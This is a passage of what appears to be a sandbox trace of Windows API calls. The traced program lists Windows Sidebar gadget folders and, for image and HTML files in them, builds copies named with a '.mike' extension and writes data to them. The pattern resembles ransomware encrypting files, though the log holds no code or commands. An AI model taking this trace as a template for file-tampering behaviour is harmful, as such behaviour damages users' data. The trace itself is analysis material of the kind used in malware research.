ftLastAccessTime.dwLowDateTime=0x1ea6723d, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea6723d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Clock.Gadget", cAlternateFileName="CLOCK~1.GAD")) returned 1 [0131.059] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1ea6723d, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea6723d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CPU.Gadget", cAlternateFileName="CPU~1.GAD")) returned 1 [0131.059] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1ea8d4f6, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea8d4f6, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Currency.Gadget", cAlternateFileName="CURREN~1.GAD")) returned 1 [0131.060] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1ea8d4f6, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea8d4f6, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PicturePuzzle.Gadget", cAlternateFileName="PICTUR~1.GAD")) returned 1 [0131.060] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1ea8d4f6, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea8d4f6, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RSSFeeds.Gadget", cAlternateFileName="RSSFEE~1.GAD")) returned 1 [0131.060] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1ea8d4f6, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea8d4f6, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SlideShow.Gadget", cAlternateFileName="SLIDES~1.GAD")) returned 1 [0131.060] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1ea6723d, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea6723d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Weather.Gadget", cAlternateFileName="WEATHE~1.GAD")) returned 1 [0131.061] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0131.061] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0131.061] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0131.061] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0131.062] CoTaskMemFree (pv=0x4e1c10) [0131.062] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0131.062] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget", nBufferLength=0x105, lpBuffer=0x2aed24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget", lpFilePart=0x0) returned 0x3e [0131.063] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1ea8d4f6, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea8d4f6, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0131.063] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb90bdeb0, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb90bdeb0, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb371d95c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1a74, dwReserved0=0x0, dwReserved1=0x0, cFileName="drag.png", cAlternateFileName="")) returned 1 [0131.064] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea8d4f6, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22a11cd0, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea8d4f6, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0131.064] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3743abc, ftCreationTime.dwHighDateTime=0x1c9ea13, ftLastAccessTime.dwLowDateTime=0xb3743abc, ftLastAccessTime.dwHighDateTime=0x1c9ea13, ftLastWriteTime.dwLowDateTime=0xb3769c1c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xd13, dwReserved0=0x0, dwReserved1=0x0, cFileName="icon.png", cAlternateFileName="")) returned 1 [0131.064] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8191f35e, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8191f35e, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="images", cAlternateFileName="")) returned 1 [0131.064] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9097d51, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb9097d51, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb443525c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1816, dwReserved0=0x0, dwReserved1=0x0, cFileName="logo.png", cAlternateFileName="")) returned 1 [0131.064] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0131.065] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0131.066] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0131.066] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\drag.png.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\drag.png.mike", lpFilePart=0x0) returned 0x4c [0131.067] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\drag.png", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\drag.png", lpFilePart=0x0) returned 0x47 [0131.073] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\drag.png.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\drag.png.mike", lpFilePart=0x0) returned 0x4c [0131.074] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\drag.png.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\drag.png.mike", lpFilePart=0x0) returned 0x4c [0131.074] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\drag.png", dwFileAttributes=0x80) returned 0 [0131.075] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\drag.png.mike", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\drag.png.mike", lpFilePart=0x0) returned 0x4c [0131.075] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\drag.png.mike", nBufferLength=0x105, lpBuffer=0x2aec18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\drag.png.mike", lpFilePart=0x0) returned 0x4c [0131.077] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0131.078] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\icon.png.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\icon.png.mike", lpFilePart=0x0) returned 0x4c [0131.078] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\icon.png", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\icon.png", lpFilePart=0x0) returned 0x47 [0131.083] WriteFile (in: hFile=0x284, lpBuffer=0x229ad64*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0ec, lpOverlapped=0x0 | out: lpBuffer=0x229ad64*, lpNumberOfBytesWritten=0x2af0ec*=0x20c, lpOverlapped=0x0) returned 1 [0131.084] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\icon.png.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\icon.png.mike", lpFilePart=0x0) returned 0x4c [0131.084] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\icon.png.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\icon.png.mike", lpFilePart=0x0) returned 0x4c [0131.084] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\icon.png", dwFileAttributes=0x80) returned 0 [0131.085] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\icon.png.mike", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\icon.png.mike", lpFilePart=0x0) returned 0x4c [0131.086] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\icon.png.mike", nBufferLength=0x105, lpBuffer=0x2aec18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\icon.png.mike", lpFilePart=0x0) returned 0x4c [0131.088] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0131.088] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\logo.png.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\logo.png.mike", lpFilePart=0x0) returned 0x4c [0131.088] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\logo.png", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\logo.png", lpFilePart=0x0) returned 0x47 [0131.243] WriteFile (in: hFile=0x284, lpBuffer=0x22af018*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0ec, lpOverlapped=0x0 | out: lpBuffer=0x22af018*, lpNumberOfBytesWritten=0x2af0ec*=0x20c, lpOverlapped=0x0) returned 1 [0131.243] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\logo.png.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\logo.png.mike", lpFilePart=0x0) returned 0x4c [0131.244] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\logo.png", dwFileAttributes=0x80) returned 0 [0131.245] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\logo.png.mike", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\logo.png.mike", lpFilePart=0x0) returned 0x4c [0131.245] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\logo.png.mike", nBufferLength=0x105, lpBuffer=0x2aec18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\logo.png.mike", lpFilePart=0x0) returned 0x4c [0131.246] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x176c3a00, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x17866920, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0131.247] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb90bdeb0, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb90bdeb0, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb371d95c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1a74, dwReserved0=0x0, dwReserved1=0x0, cFileName="drag.png", cAlternateFileName="")) returned 1 [0131.247] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea8d4f6, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22a11cd0, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea8d4f6, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0131.247] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3743abc, ftCreationTime.dwHighDateTime=0x1c9ea13, ftLastAccessTime.dwLowDateTime=0xb3743abc, ftLastAccessTime.dwHighDateTime=0x1c9ea13, ftLastWriteTime.dwLowDateTime=0xb3769c1c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xd13, dwReserved0=0x0, dwReserved1=0x0, cFileName="icon.png", cAlternateFileName="")) returned 1 [0131.247] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8191f35e, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8191f35e, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="images", cAlternateFileName="")) returned 1 [0131.247] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9097d51, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb9097d51, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb443525c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1816, dwReserved0=0x0, dwReserved1=0x0, cFileName="logo.png", cAlternateFileName="")) returned 1 [0131.247] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9097d51, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb9097d51, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb443525c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1816, dwReserved0=0x0, dwReserved1=0x0, cFileName="logo.png", cAlternateFileName="")) returned 0 [0131.248] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0131.248] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0131.248] CoTaskMemFree (pv=0x4e1c10) [0131.248] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0131.248] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US", nBufferLength=0x105, lpBuffer=0x2aecdc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US", lpFilePart=0x0) returned 0x44 [0131.248] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea8d4f6, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22a11cd0, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea8d4f6, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0131.249] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x119103a1, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x119103a1, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x4a9e, dwReserved0=0x0, dwReserved1=0x0, cFileName="calendar.html", cAlternateFileName="")) returned 1 [0131.249] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea8d4f6, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22a37f89, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea8d4f6, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="css", cAlternateFileName="")) returned 1 [0131.249] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x119103a1, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x119103a1, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x3f2, dwReserved0=0x0, dwReserved1=0x0, cFileName="gadget.xml", cAlternateFileName="")) returned 1 [0131.249] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea8d4f6, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22a37f89, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea8d4f6, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="js", cAlternateFileName="")) returned 1 [0131.249] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea8d4f6, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22a37f89, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea8d4f6, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="js", cAlternateFileName="")) returned 0 [0131.251] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0131.251] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\calendar.html.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\calendar.html.mike", lpFilePart=0x0) returned 0x57 [0131.251] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\calendar.html", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\calendar.html", lpFilePart=0x0) returned 0x52 [0131.257] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\calendar.html.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\calendar.html.mike", lpFilePart=0x0) returned 0x57 [0131.257] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\calendar.html.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\calendar.html.mike", lpFilePart=0x0) returned 0x57 